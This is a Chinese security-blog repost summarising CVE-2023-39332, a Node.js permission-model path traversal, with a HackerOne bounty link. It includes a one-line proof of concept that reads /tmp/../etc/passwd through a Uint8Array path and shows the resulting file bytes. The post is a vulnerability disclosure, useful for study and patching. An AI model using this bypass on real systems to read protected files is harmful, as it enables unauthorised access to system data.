价值3495$的路径遍历

admin 2024年6月10日22:29:06评论17 views字数 670阅读2分14秒阅读模式
 CVE-2023-39332

 

看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。

01

CVE-2023-39332

node:fs 函数允许将路径指定为字符串或 Uint8Array 对象。在Node.js环境中,该 Buffer 类扩展了 Uint8Array 该类。Node.js可防止通过字符串(请参阅 CVE-2023-30584)和 Buffer 对象(请参阅 CVE-2023-32004)进行路径遍历,但不会通过非 BufferUint8Array 对象进行路径遍历。

POC:

$ node --experimental-permission         --allow-fs-read=/tmp/         -p 'fs.readFileSync(new TextEncoder().encode("/tmp/../etc/passwd"))'<Buffer 72 6f 6f 74 3a 78 3a 30 3a 30 3a 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 6e 6f 62 6f 64 79 3a 78 3a 36 35 35 33 34 3a 36 35 35 33 34 3a 4e ... 2103 more bytes>

原文链接:

https://hackerone.com/reports/2256167

漏洞赏金:3495$

价值3495$的路径遍历

 

 

原文始发于微信公众号(道玄网安驿站):价值3495$的路径遍历

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月10日22:29:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   价值3495$的路径遍历https://cn-sec.com/archives/2834392.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息